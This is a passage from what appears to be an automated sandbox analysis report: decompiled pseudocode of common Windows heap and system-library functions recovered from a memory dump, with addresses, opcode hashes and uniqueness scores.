									_t102 = 0xc0000100;
									goto L19;
								} else {
									_t91 =  *((intOrPtr*)( *((intOrPtr*)(_t103 - 0x28)) + 0x30));
									_t66 =  *((intOrPtr*)(_t91 + 0x10));
									__eflags =  *((intOrPtr*)(_t66 + 0x48)) - _t83;
									if( *((intOrPtr*)(_t66 + 0x48)) == _t83) {
										__eflags =  *((intOrPtr*)(_t91 + 0x1c));
										if( *((intOrPtr*)(_t91 + 0x1c)) == 0) {
											L26:
											_t102 = E03042AE4(_t103 - 0x20,  *((intOrPtr*)(_t103 + 0xc)), _t82,  *((intOrPtr*)(_t103 + 0x14)),  *((intOrPtr*)(_t103 + 0x18)),  *((intOrPtr*)(_t103 + 0x1c)));
											 *((intOrPtr*)(_t103 - 0x1c)) = _t102;
											__eflags = _t102 - 0xc0000100;
											if(_t102 != 0xc0000100) {
												goto L12;
											} else {
												_t99 = 1;
												_t83 =  *((intOrPtr*)(_t103 - 0x20));
												goto L18;
											}
										} else {
											_t69 = E03026600( *((intOrPtr*)(_t91 + 0x1c)));
											__eflags = _t69;
											if(_t69 != 0) {
												goto L26;
											} else {
												_t83 =  *((intOrPtr*)(_t103 + 8));
												goto L18;
											}
										}
									} else {
										L18:
										_t102 = E03042C50(_t83,  *((intOrPtr*)(_t103 + 0xc)), _t82,  *((intOrPtr*)(_t103 + 0x14)),  *((intOrPtr*)(_t103 + 0x18)),  *((intOrPtr*)(_t103 + 0x1c)), _t99);
										L19:
										 *((intOrPtr*)(_t103 - 0x1c)) = _t102;
										goto L12;
									}
								}
								L28:
							} else {
								E0302EEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
								 *((intOrPtr*)(_t103 - 4)) = 1;
								 *((intOrPtr*)(_t103 - 0x20)) =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t103 - 0x28)) + 0x30)) + 0x10)) + 0x48));
								_t102 =  *((intOrPtr*)(_t103 + 0x1c));
								_t76 = E03042AE4(_t103 - 0x20,  *((intOrPtr*)(_t103 + 0xc)), _t82,  *((intOrPtr*)(_t103 + 0x14)),  *((intOrPtr*)(_t103 + 0x18)), _t102);
								 *((intOrPtr*)(_t103 - 0x1c)) = _t76;
								__eflags = _t76 - 0xc0000100;
								if(_t76 == 0xc0000100) {
									 *((intOrPtr*)(_t103 - 0x1c)) = E03042C50( *((intOrPtr*)(_t103 - 0x20)),  *((intOrPtr*)(_t103 + 0xc)), _t82,  *((intOrPtr*)(_t103 + 0x14)),  *((intOrPtr*)(_t103 + 0x18)), _t102, 1);
								}
								 *((intOrPtr*)(_t103 - 4)) = _t99;
								E03042ACB();
							}
						}
					}
					L12:
					 *((intOrPtr*)(_t103 - 4)) = 0xfffffffe;
					_t62 = _t102;
				}
				L13:
				return E0306D0D1(_t62);
				goto L28;
			}

0x03042990
0x03042992
0x03042997
0x030429a3
0x030429a6
0x030429ab
0x030429ad
0x030429b2
0x03085c80
0x030429b8
0x030429b8
0x030429bb
0x030429c0
0x030429c5
0x030429c6
0x030429c6
0x030429cb
0x00000000
0x00000000
0x030429cd
0x030429d0
0x030429d9
0x030429db
0x030429dd
0x03042a7f
0x03042a84
0x03042a87
0x03042a89
0x03085ca1
0x03085ca3
0x00000000
0x03042a8f
0x03042a8f
0x00000000
0x03042a8f
0x00000000
0x030429e3
0x030429e3
0x030429e3
0x00000000
0x030429e3
0x030429dd
0x00000000
0x030429db
0x030429e6
0x030429e9
0x030429eb
0x030429ed
0x030429f3
0x030429f5
0x030429f8
0x030429fa
0x03042a97
0x03042a9a
0x03042a9d
0x03042add
0x00000000
0x03042a9f
0x03042aa2
0x03042aa5
0x03042aa8
0x03042aab
0x03085cab
0x03085caf
0x03085cc5
0x03085cda
0x03085cdc
0x03085cdf
0x03085ce5
0x00000000
0x03085ceb
0x03085ced
0x03085cee
0x00000000
0x03085cee
0x03085cb1
0x03085cb4
0x03085cb9
0x03085cbb
0x00000000
0x03085cbd
0x03085cbd
0x00000000
0x03085cbd
0x03085cbb
0x03042ab1
0x03042ab1
0x03042ac4
0x03042ac6
0x03042ac6
0x00000000
0x03042ac6
0x03042aab
0x00000000
0x03042a00
0x03042a09
0x03042a0e
0x03042a21
0x03042a24
0x03042a35
0x03042a3a
0x03042a3d
0x03042a42
0x03042a59
0x03042a59
0x03042a5c
0x03042a5f
0x03042a5f
0x030429fa
0x030429f3
0x03042a64
0x03042a64
0x03042a6b
0x03042a6b
0x03042a6d
0x03042a72
0x00000000

Memory Dump Source

Source File: 00000002.00000002.276352542.0000000002FF0000.00000040.00000001.sdmp, Offset: 02FF0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f7e2d6a00c8b3248acfdfdd4a566a1c854b29c07f78828cfc91059de7ddae921
Instruction ID: ddb1da1f39ad686858962a71148d57a9e3b3f2c5749b9e80762c43e92fddf3d9
Opcode Fuzzy Hash: f7e2d6a00c8b3248acfdfdd4a566a1c854b29c07f78828cfc91059de7ddae921
Instruction Fuzzy Hash: 445129B5A02219DFDF65DF55C880ADEBBB9BF48310F198865F814AB250C3359E62CF90

Uniqueness

Uniqueness Score: -1.00%

Function 03044BAD, Relevance: .1, Instructions: 131
COMMON

Download Yara Rule

C-Code - Quality: 85%

			E03044BAD(intOrPtr __ecx, short __edx, signed char _a4, signed short _a8) {
				signed int _v8;
				short _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				char _v36;
				char _v156;
				short _v158;
				intOrPtr _v160;
				char _v164;
				intOrPtr _v168;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t45;
				intOrPtr _t74;
				signed char _t77;
				intOrPtr _t84;
				char* _t85;
				void* _t86;
				intOrPtr _t87;
				signed short _t88;
				signed int _t89;

				_t83 = __edx;
				_v8 =  *0x310d360 ^ _t89;
				_t45 = _a8 & 0x0000ffff;
				_v158 = __edx;
				_v168 = __ecx;
				if(_t45 == 0) {
					L22:
					_t86 = 6;
					L12:
					E0301CC50(_t86);
					L11:
					return E0305B640(_t86, _t77, _v8 ^ _t89, _t83, _t84, _t86);
				}
				_t77 = _a4;
				if((_t77 & 0x00000001) != 0) {
					goto L22;
				}
				_t8 = _t77 + 0x34; // 0xdce0ba00
				if(_t45 !=  *_t8) {
					goto L22;
				}
				_t9 = _t77 + 0x24; // 0x3108504
				E03032280(_t9, _t9);
				_t87 = 0x78;
				 *(_t77 + 0x2c) =  *( *[fs:0x18] + 0x24);
				E0305FA60( &_v156, 0, _t87);
				_t13 = _t77 + 0x30; // 0x3db8
				_t85 =  &_v156;
				_v36 =  *_t13;
				_v28 = _v168;
				_v32 = 0;
				_v24 = 0;
				_v20 = _v158;
				_v160 = 0;
				while(1) {
					_push( &_v164);
					_push(_t87);
					_push(_t85);
					_push(0x18);
					_push( &_v36);
					_push(0x1e);
					_t88 = E0305B0B0();
					if(_t88 != 0xc0000023) {
						break;
					}
					if(_t85 !=  &_v156) {
						L030377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t85);
					}
					_t84 = L03034620(0,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v164);
					_v168 = _v164;
					if(_t84 == 0) {
						_t88 = 0xc0000017;
						goto L19;
					} else {
						_t74 = _v160 + 1;
						_v160 = _t74;
						if(_t74 >= 0x10) {
							L19:
							_t86 = E0301CCC0(_t88);
							if(_t86 != 0) {
								L8:
								 *(_t77 + 0x2c) =  *(_t77 + 0x2c) & 0x00000000;
								_t30 = _t77 + 0x24; // 0x3108504
								E0302FFB0(_t77, _t84, _t30);
								if(_t84 != 0 && _t84 !=  &_v156) {
									L030377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t84);
								}
								if(_t86 != 0) {
									goto L12;
								} else {
									goto L11;
								}
							}
							L6:
							 *(_t77 + 0x36) =  *(_t77 + 0x36) | 0x00004000;
							if(_v164 != 0) {
								_t83 = _t84;
								E03044F49(_t77, _t84);
							}
							goto L8;
						}
						_t87 = _v168;
						continue;
					}
				}
				if(_t88 != 0) {
					goto L19;
				}
				goto L6;
			}

0x03044bad
0x03044bbf
0x03044bc2
0x03044bc6
0x03044bcd
0x03044bd9
0x030867fe
0x03086800
0x03044ccc
0x03044ccd
0x03044cb7
0x03044cc9
0x03044cc9
0x03044bdf
0x03044be5
0x00000000
0x00000000
0x03044beb
0x03044bef
0x00000000
0x00000000
0x03044bf5
0x03044bf9
0x03044c06
0x03044c0b
0x03044c17
0x03044c1c
0x03044c1f
0x03044c25
0x03044c33
0x03044c3d
0x03044c40
0x03044c43
0x03044c47
0x03044c4d
0x03044c53
0x03044c54
0x03044c55
0x03044c56
0x03044c5b
0x03044c5c
0x03044c63
0x03044c6b
0x00000000
0x00000000
0x03086776
0x03086784
0x03086784
0x0308679f
0x030867a7
0x030867af
0x030867ce
0x00000000
0x030867b1
0x030867b7
0x030867b8
0x030867c1
0x030867d3
0x030867d9
0x030867dd
0x03044c94
0x03044c94
0x03044c98
0x03044c9c
0x03044ca3
0x030867f4
0x030867f4
0x03044cb5
0x00000000
0x00000000
0x00000000
0x00000000
0x03044cb5
0x03044c79
0x03044c7e
0x03044c89
0x03044c8b
0x03044c8f
0x03044c8f
0x00000000
0x03044c89
0x030867c3
0x00000000
0x030867c3
0x030867af
0x03044c73
0x00000000
0x00000000
0x00000000

Memory Dump Source

Source File: 00000002.00000002.276352542.0000000002FF0000.00000040.00000001.sdmp, Offset: 02FF0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 34992b88e856c14326f716b004baf1301c08692c45674a47cd1cdc45fafcc3ee
Instruction ID: f77ef701a9120177cfbde6b8b36124e54850b69b8dd4f77a9abee627305d1527
Opcode Fuzzy Hash: 34992b88e856c14326f716b004baf1301c08692c45674a47cd1cdc45fafcc3ee
Instruction Fuzzy Hash: 4E41C375A4222C9BCB60EF64C940BEEB7F8EF45700F0944A5E948AB240DB75DE80CB91

Uniqueness

Uniqueness Score: -1.00%

Function 03044D3B, Relevance: .1, Instructions: 131
COMMON

Download Yara Rule

C-Code - Quality: 78%

			E03044D3B(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				signed int _v12;
				char _v176;
				char _v177;
				char _v184;
				intOrPtr _v192;
				intOrPtr _v196;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed short _t42;
				char* _t44;
				intOrPtr _t46;
				intOrPtr _t50;
				char* _t57;
				intOrPtr _t59;
				intOrPtr _t67;
				signed int _t69;

				_t64 = __edx;
				_v12 =  *0x310d360 ^ _t69;
				_t65 = 0xa0;
				_v196 = __edx;
				_v177 = 0;
				_t67 = __ecx;
				_v192 = __ecx;
				E0305FA60( &_v176, 0, 0xa0);
				_t57 =  &_v176;
				_t59 = 0xa0;
				if( *0x3107bc8 != 0) {
					L3:
					while(1) {
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsd");
						_t67 = _v192;
						 *((intOrPtr*)(_t57 + 0x10)) = _a4;
						 *(_t57 + 0x24) =  *(_t57 + 0x24) & 0x00000000;
						 *(_t57 + 0x14) =  *(_t67 + 0x34) & 0x0000ffff;
						 *((intOrPtr*)(_t57 + 0x20)) = _v196;
						_push( &_v184);
						_push(_t59);
						_push(_t57);
						_push(0xa0);
						_push(_t57);
						_push(0xf);
						_t42 = E0305B0B0();
						if(_t42 != 0xc0000023) {
							break;
						}
						if(_v177 != 0) {
							L030377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t57);
						}
						_v177 = 1;
						_t44 = L03034620(_t59,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v184);
						_t59 = _v184;
						_t57 = _t44;
						if(_t57 != 0) {
							continue;
						} else {
							_t42 = 0xc0000017;
							break;
						}
					}
					if(_t42 != 0) {
						_t65 = E0301CCC0(_t42);
						if(_t65 != 0) {
							L10:
							if(_v177 != 0) {
								if(_t57 != 0) {
									L030377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t57);
								}
							}
							_t46 = _t65;
							L12:
							return E0305B640(_t46, _t57, _v12 ^ _t69, _t64, _t65, _t67);
						}
						L7:
						_t50 = _a4;
						 *((intOrPtr*)(_t67 + 0x30)) =  *((intOrPtr*)(_t57 + 0x18));
						if(_t50 != 3) {
							if(_t50 == 2) {
								goto L8;
							}
							L9:
							if(E0305F380(_t67 + 0xc, 0x2ff5138, 0x10) == 0) {
								 *0x31060d8 = _t67;
							}
							goto L10;
						}
						L8:
						_t64 = _t57 + 0x28;
						E03044F49(_t67, _t57 + 0x28);
						goto L9;
					}
					_t65 = 0;
					goto L7;
				}
				if(E03044E70(0x31086b0, 0x3045690, 0, 0) != 0) {
					_t46 = E0301CCC0(_t56);
					goto L12;
				} else {
					_t59 = 0xa0;
					goto L3;
				}
			}

0x03044d3b
0x03044d4d
0x03044d53
0x03044d58
0x03044d65
0x03044d6c
0x03044d71
0x03044d77
0x03044d7f
0x03044d8c
0x03044d8e
0x03044dad
0x03044db0
0x03044db7
0x03044db8
0x03044db9
0x03044dba
0x03044dbb
0x03044dc1
0x03044dc8
0x03044dcc
0x03044dd5
0x03044dde
0x03044ddf
0x03044de0
0x03044de1
0x03044de6
0x03044de7
0x03044de9
0x03044df3
0x00000000
0x00000000
0x03086c7c
0x03086c8a
0x03086c8a
0x03086c9d
0x03086ca7
0x03086cac
0x03086cb2
0x03086cb9
0x00000000
0x03086cbf
0x03086cbf
0x00000000
0x03086cbf
0x03086cb9
0x03044dfb
0x03086ccf
0x03086cd3
0x03044e32
0x03044e39
0x03086ce0
0x03086cf2
0x03086cf2
0x03086ce0
0x03044e3f
0x03044e41
0x03044e51
0x03044e51
0x03044e03
0x03044e03
0x03044e09
0x03044e0f
0x03044e57
0x00000000
0x00000000
0x03044e1b
0x03044e30
0x03044e5b
0x03044e5b
0x00000000
0x03044e30
0x03044e11
0x03044e11
0x03044e16
0x00000000
0x03044e16
0x03044e01
0x00000000
0x03044e01
0x03044da5
0x03086c6b
0x00000000
0x03044dab
0x03044dab
0x00000000
0x03044dab

Memory Dump Source

Source File: 00000002.00000002.276352542.0000000002FF0000.00000040.00000001.sdmp, Offset: 02FF0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b606167e965a2e5472a02a5578b51817c009ef15af92c045dd27983f6f0b74be
Instruction ID: 9f52711f0633a8bd4f0a47c1df5254602529b97061e0d13b8e3de83b50783c24
Opcode Fuzzy Hash: b606167e965a2e5472a02a5578b51817c009ef15af92c045dd27983f6f0b74be
Instruction Fuzzy Hash: 674106B5A423189FEB21DF16CC80FABB7E9EB45610F0500A9ED459B280D7B1EE40CB91

Uniqueness

Uniqueness Score: -1.00%

Function 030E2B28, Relevance: .1, Instructions: 129
COMMONCrypto

Download Yara Rule

C-Code - Quality: 92%

			E030E2B28(signed int __ecx, signed int __edx, signed int _a4, signed int _a8, intOrPtr* _a12) {
				char _v5;
				signed int _v12;
				signed int _v16;
				void* __ebx;
				void* __edi;
				signed int _t30;
				signed int _t35;
				unsigned int _t50;
				signed int _t52;
				signed int _t53;
				unsigned int _t58;
				signed int _t61;
				signed int _t63;
				signed int _t67;
				signed int _t69;
				intOrPtr _t75;
				signed int _t81;
				signed int _t87;
				void* _t88;
				signed int _t90;
				signed int _t93;

				_t69 = __ecx;
				_t30 = _a4;
				_t90 = __edx;
				_t81 = __ecx;
				_v12 = __ecx;
				_t87 = _t30 - 8;
				if(( *(__ecx + 0x38) & 0x00000001) != 0 && (_t30 & 0x00000fff) == 0) {
					_t87 = _t87 - 8;
				}
				_t67 = 0;
				if(_t90 != 0) {
					L14:
					if((0x0000abed ^  *(_t90 + 0x16)) ==  *((intOrPtr*)(_t90 + 0x14))) {
						_t75 = (( *_t87 ^  *0x3106110 ^ _t87) >> 0x00000001 & 0x00007fff) * 8 - 8;
						 *_a12 = _t75;
						_t35 = _a8 & 0x00000001;
						_v16 = _t35;
						if(_t35 == 0) {
							E03032280(_t35, _t81);
							_t81 = _v12;
						}
						_v5 = 0xff;
						if(( *_t87 ^  *0x3106110 ^ _t87) < 0) {
							_t91 = _v12;
							_t88 = E030E241A(_v12, _t90, _t87, _a8,  &_v5);
							if(_v16 == _t67) {
								E0302FFB0(_t67, _t88, _t91);
							}
							if(_t88 != 0) {
								E030E3209(_t91, _t88, _a8);
							}
							_t67 = 1;
						} else {
							_push(_t75);
							_push(_t67);
							E030DA80D( *((intOrPtr*)(_t81 + 0x20)), 8, _a4, _t87);
							if(_v16 == _t67) {
								E0302FFB0(_t67, _t87, _v12);
							}
						}
					} else {
						_push(_t69);
						_push(_t67);
						E030DA80D( *((intOrPtr*)(_t81 + 0x20)), 0x12, _t90, _t67);
					}
					return _t67;
				}
				_t69 =  *0x3106110; // 0xd8264b48
				_t93 = _t87;
				_t50 = _t69 ^ _t87 ^  *_t87;
				if(_t50 >= 0) {
					_t52 = _t50 >> 0x00000010 & 0x00007fff;
					if(_t52 == 0) {
						L12:
						_t53 = _t67;
						L13:
						_t90 = _t93 - (_t53 << 0x0000000c) & 0xfffff000;
						goto L14;
					}
					_t93 = _t87 - (_t52 << 3);
					_t58 =  *_t93 ^ _t69 ^ _t93;
					if(_t58 < 0) {
						L10:
						_t61 =  *(_t93 + 4) ^ _t69 ^ _t93;
						L11:
						_t53 = _t61 & 0x000000ff;
						goto L13;
					}
					_t63 = _t58 >> 0x00000010 & 0x00007fff;
					if(_t63 == 0) {
						goto L12;
					}
					_t93 = _t93 + _t63 * 0xfffffff8;
					goto L10;
				}
				_t61 =  *(_t87 + 4) ^ _t69 ^ _t87;
				goto L11;
			}

0x030e2b28
0x030e2b30
0x030e2b35
0x030e2b37
0x030e2b3a
0x030e2b3d
0x030e2b44
0x030e2b4d
0x030e2b4d
0x030e2b50
0x030e2b54
0x030e2bb0
0x030e2bbd
0x030e2be8
0x030e2bef
0x030e2bf4
0x030e2bf7
0x030e2bfa
0x030e2bfd
0x030e2c02
0x030e2c02
0x030e2c0f
0x030e2c13
0x030e2c3b
0x030e2c4a
0x030e2c4f
0x030e2c52
0x030e2c52
0x030e2c59
0x030e2c62
0x030e2c62
0x030e2c69
0x030e2c15
0x030e2c18
0x030e2c19
0x030e2c21
0x030e2c29
0x030e2c2f
0x030e2c2f
0x030e2c29
0x030e2bbf
0x030e2bc2
0x030e2bc3
0x030e2bc9
0x030e2bc9
0x030e2c72
0x030e2c72
0x030e2b56
0x030e2b5c
0x030e2b62
0x030e2b64
0x030e2b72
0x030e2b77
0x030e2ba3
0x030e2ba3
0x030e2ba5
0x030e2baa
0x00000000
0x030e2baa
0x030e2b7e
0x030e2b84
0x030e2b86
0x030e2b97
0x030e2b9c
0x030e2b9e
0x030e2b9e
0x00000000
0x030e2b9e
0x030e2b8b
0x030e2b90
0x00000000
0x00000000
0x030e2b95
0x00000000
0x030e2b95
0x030e2b6b
0x00000000

Memory Dump Source

Source File: 00000002.00000002.276352542.0000000002FF0000.00000040.00000001.sdmp, Offset: 02FF0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 05de99bb2fff01e1cc6da43aa609276d86920add867e38d6dd4f9b241aa29ea0
Instruction ID: 5af6fc0853e473e088df86c47d66e1f42cd51e3a9268ea2d4c0aa048796926e7
Opcode Fuzzy Hash: 05de99bb2fff01e1cc6da43aa609276d86920add867e38d6dd4f9b241aa29ea0
Instruction Fuzzy Hash: 44411877B11215AFC714EF28C8809BBB7EDEF88720B048E69E855CB280D674ED56C790

Uniqueness

Uniqueness Score: -1.00%

Function 030DD466, Relevance: .1, Instructions: 123
COMMONCrypto

Download Yara Rule

C-Code - Quality: 67%

			E030DD466(signed int __ecx, unsigned int __edx, void* __eflags, intOrPtr _a4) {
				signed int _v8;
				char _v9;
				intOrPtr _v16;
				short _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t53;
				signed int _t67;
				signed char _t75;
				short _t84;
				signed int _t87;
				short* _t89;
				unsigned int _t90;
				signed int _t95;
				void* _t98;
				signed int _t99;

				_v8 =  *0x310d360 ^ _t99;
				_t90 = __edx;
				_v36 = __ecx;
				_v20 = 0;
				_v40 = __edx >> 0x0000000c & 0x0000ffff ^  *(__edx + 0x18) & 0x0000ffff ^  *0x3106114 & 0x0000ffff;
				_v28 = 0;
				_t87 = E030DDDF9(__edx, _a4, __edx >> 0x0000000c & 0x0000ffff ^  *(__edx + 0x18) & 0x0000ffff ^  *0x3106114 & 0x0000ffff,  &_v24,  &_v28, __edx >> 0x0000000c & 0x0000ffff ^  *(__edx + 0x18) & 0x0000ffff ^  *0x3106114 & 0x0000ffff,  &_v9);
				_v32 = _t87;
				if(_t87 != 0xffffffff) {
					_t75 =  *(__edx + 0x1c) & 0x000000ff;
					_v20 = 1;
					_v16 = 1;
					 *0x310b1e0( *__ecx, (_t87 << _t75) + __edx, _v24 << _t75);
					_t53 =  *( *(__ecx + 0xc) ^  *0x3106110 ^ __ecx)();
					_t69 = _t53;
					if(_t53 < 0) {
						_t88 = _v16;
					} else {
						_t69 = 0;
						_t98 = 0;
						_t89 = ( *(__edx + 0x1e) & 0x0000ffff) + __edx + _v32 * 2;
						asm("sbb eax, eax");
						_t67 =  !(_v24 + _v24 + _t89) & _v24 + _v24 >> 0x00000001;
						if(_t67 > 0) {
							_t84 = _v20;
							do {
								if( *_t89 == _t69) {
									 *_t89 = _t84;
								}
								_t89 = _t89 + 2;
								_t98 = _t98 + 1;
							} while (_t98 < _t67);
						}
						goto L2;
						L18:
					}
				} else {
					_t69 = 0;
					L2:
					_t88 = _t69;
				}
				_t95 = _v28;
				if(_t95 != 0) {
					_t95 =  ~(_t95 <<  *(_t90 + 0x1c) >> 0xc);
					asm("lock xadd [eax], esi");
				}
				if(_t88 != 0) {
					_t88 = _a4;
					E030DD864(_t90, _a4, _v40, 2, 0);
				}
				if(_v20 != 0) {
					E0302FFB0(_t69, _t90, _t90 + 0xc);
				}
				return E0305B640(_t69, _t69, _v8 ^ _t99, _t88, _t90, _t95);
				goto L18;
			}

0x030dd475
0x030dd47b
0x030dd492
0x030dd49e
0x030dd4a4
0x030dd4ac
0x030dd4bc
0x030dd4be
0x030dd4c4
0x030dd4cc
0x030dd4dc
0x030dd4e1
0x030dd4f5
0x030dd4fb
0x030dd4fd
0x030dd501
0x030dd53d
0x030dd503
0x030dd507
0x030dd50e
0x030dd510
0x030dd520
0x030dd524
0x030dd526
0x030dd528
0x030dd52b
0x030dd52e
0x030dd530
0x030dd530
0x030dd533
0x030dd536
0x030dd537
0x030dd53b
0x00000000
0x00000000
0x030dd526
0x030dd4c6
0x030dd4c6
0x030dd4c8
0x030dd4c8
0x030dd4c8
0x030dd540
0x030dd545
0x030dd555
0x030dd55a
0x030dd55a
0x030dd560
0x030dd562
0x030dd56e
0x030dd56e
0x030dd577
0x030dd57d
0x030dd57d
0x030dd594
0x00000000

Memory Dump Source

Source File: 00000002.00000002.276352542.0000000002FF0000.00000040.00000001.sdmp, Offset: 02FF0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9ec666521e252b0fe61f3332f94bda104f865bf487bf804bbb40b278a0a69f04
Instruction ID: fd904db89cc8a7e30bfdf9367ea133c53ad656d8ca303c814cc61a1e7eee4740
Opcode Fuzzy Hash: 9ec666521e252b0fe61f3332f94bda104f865bf487bf804bbb40b278a0a69f04
Instruction Fuzzy Hash: 6741AF71E012299BCB14DFA9D881ABEF7F9FF88314B15426AE815EB244D770ED41CB90

Uniqueness

Uniqueness Score: -1.00%

Function 03028A0A, Relevance: .1, Instructions: 120
COMMON

Download Yara Rule

C-Code - Quality: 94%

			E03028A0A(intOrPtr* __ecx, signed int __edx) {
				signed int _v8;
				char _v524;
				signed int _v528;
				void* _v532;
				char _v536;
				char _v540;
				char _v544;
				intOrPtr* _v548;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t44;
				void* _t46;
				void* _t48;
				signed int _t53;
				signed int _t55;
				intOrPtr* _t62;
				void* _t63;
				unsigned int _t75;
				signed int _t79;
				unsigned int _t81;
				unsigned int _t83;
				signed int _t84;
				void* _t87;

				_t76 = __edx;
				_v8 =  *0x310d360 ^ _t84;
				_v536 = 0x200;
				_t79 = 0;
				_v548 = __edx;
				_v544 = 0;
				_t62 = __ecx;
				_v540 = 0;
				_v532 =  &_v524;
				if(__edx == 0 || __ecx == 0) {
					L6:
					return E0305B640(_t79, _t62, _v8 ^ _t84, _t76, _t79, _t81);
				} else {
					_v528 = 0;
					E0302E9C0(1, __ecx, 0, 0,  &_v528);
					_t44 = _v528;
					_t81 =  *(_t44 + 0x48) & 0x0000ffff;
					_v528 =  *(_t44 + 0x4a) & 0x0000ffff;
					_t46 = 0xa;
					_t87 = _t81 - _t46;
					if(_t87 > 0 || _t87 == 0) {
						 *_v548 = 0x2ff1180;
						L5:
						_t79 = 1;
						goto L6;
					} else {
						_t48 = E03041DB5(_t62,  &_v532,  &_v536);
						_t76 = _v528;
						if(_t48 == 0) {
							L9:
							E03053C2A(_t81, _t76,  &_v544);
							 *_v548 = _v544;
							goto L5;
						}
						_t62 = _v532;
						if(_t62 != 0) {
							_t83 = (_t81 << 0x10) + (_t76 & 0x0000ffff);
							_t53 =  *_t62;
							_v528 = _t53;
							if(_t53 != 0) {
								_t63 = _t62 + 4;
								_t55 = _v528;
								do {
									if( *((intOrPtr*)(_t63 + 0x10)) == 1) {
										if(E03028999(_t63,  &_v540) == 0) {
											_t55 = _v528;
										} else {
											_t75 = (( *(_v540 + 0x14) & 0x0000ffff) << 0x10) + ( *(_v540 + 0x16) & 0x0000ffff);
											_t55 = _v528;
											if(_t75 >= _t83) {
												_t83 = _t75;
											}
										}
									}
									_t63 = _t63 + 0x14;
									_t55 = _t55 - 1;
									_v528 = _t55;
								} while (_t55 != 0);
								_t62 = _v532;
							}
							if(_t62 !=  &_v524) {
								L030377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t79, _t62);
							}
							_t76 = _t83 & 0x0000ffff;
							_t81 = _t83 >> 0x10;
						}
						goto L9;
					}
				}
			}

0x03028a0a
0x03028a1c
0x03028a23
0x03028a2e
0x03028a30
0x03028a36
0x03028a3c
0x03028a3e
0x03028a4a
0x03028a52
0x03028a9c
0x03028aae
0x03028a58
0x03028a5e
0x03028a6a
0x03028a6f
0x03028a75
0x03028a7d
0x03028a85
0x03028a86
0x03028a89
0x03028a93
0x03028a99
0x03028a9b
0x00000000
0x03028aaf
0x03028abe
0x03028ac3
0x03028acb
0x03028ad7
0x03028ae0
0x03028af1
0x00000000
0x03028af1
0x03028acd
0x03028ad5
0x03028afb
0x03028afd
0x03028aff
0x03028b07
0x03028b22
0x03028b24
0x03028b2a
0x03028b2e
0x03028b3f
0x03028b78
0x03028b41
0x03028b52
0x03028b54
0x03028b5c
0x03028b74
0x03028b74
0x03028b5c
0x03028b3f
0x03028b5e
0x03028b61
0x03028b64
0x03028b64
0x03028b6c
0x03028b6c
0x03028b11
0x03079cd5
0x03079cd5
0x03028b17
0x03028b1a
0x03028b1a
0x00000000
0x03028ad5
0x03028a89

Memory Dump Source

Source File: 00000002.00000002.276352542.0000000002FF0000.00000040.00000001.sdmp, Offset: 02FF0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ea988c91171bf8796df3fbe8faba8c3d701a52a31e82110259b7683bb5416e32
Instruction ID: 7f1d610d70a5874d745b0cbf697542fc1ab2ee7ee50f301d066ce5c1d5aaa2be
Opcode Fuzzy Hash: ea988c91171bf8796df3fbe8faba8c3d701a52a31e82110259b7683bb5416e32
Instruction Fuzzy Hash: 854188B9A0133C9BDB64CF15C888AEAB7F8FB84300F1585E9E81997241DB709E80CF50

Uniqueness

Uniqueness Score: -1.00%

Function 030DAA16, Relevance: .1, Instructions: 120
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E030DAA16(void* __ecx, intOrPtr __edx, signed int _a4, short _a8) {
				intOrPtr _v8;
				char _v12;
				signed int _v16;
				signed char _v20;
				intOrPtr _v24;
				char* _t37;
				void* _t47;
				signed char _t51;
				void* _t53;
				char _t55;
				intOrPtr _t57;
				signed char _t61;
				intOrPtr _t75;
				void* _t76;
				signed int _t81;
				intOrPtr _t82;

				_t53 = __ecx;
				_t55 = 0;
				_v20 = _v20 & 0;
				_t75 = __edx;
				_t81 = ( *(__ecx + 0xc) | _a4) & 0x93000f0b;
				_v24 = __edx;
				_v12 = 0;
				if((_t81 & 0x01000000) != 0) {
					L5:
					if(_a8 != 0) {
						_t81 = _t81 | 0x00000008;
					}
					_t57 = E030DABF4(_t55 + _t75, _t81);
					_v8 = _t57;
					if(_t57 < _t75 || _t75 > 0x7fffffff) {
						_t76 = 0;
						_v16 = _v16 & 0;
					} else {
						_t59 = _t53;
						_t76 = E030DAB54(_t53, _t75, _t57, _t81 & 0x13000003,  &_v16);
						if(_t76 != 0 && (_t81 & 0x30000f08) != 0) {
							_t47 = E030DAC78(_t53, _t76, _v24, _t59, _v12, _t81, _a8);
							_t61 = _v20;
							if(_t61 != 0) {
								 *(_t47 + 2) =  *(_t47 + 2) ^ ( *(_t47 + 2) ^ _t61) & 0x0000000f;
								if(E030BCB1E(_t61, _t53, _t76, 2, _t47 + 8) < 0) {
									L030377F0(_t53, 0, _t76);
									_t76 = 0;
								}
							}
						}
					}
					_t82 = _v8;
					L16:
					if(E03037D50() == 0) {
						_t37 = 0x7ffe0380;
					} else {
						_t37 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
					}
					if( *_t37 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
						E030D131B(_t53, _t76, _t82, _v16);
					}
					return _t76;
				}
